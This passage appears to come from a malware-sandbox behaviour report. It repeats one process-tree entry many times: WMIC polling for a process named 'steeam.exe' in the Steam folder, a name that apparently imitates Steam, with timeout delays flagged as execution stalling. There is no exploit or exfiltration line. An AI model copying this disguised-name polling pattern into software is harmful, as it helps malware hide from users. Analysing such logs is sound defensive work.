C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
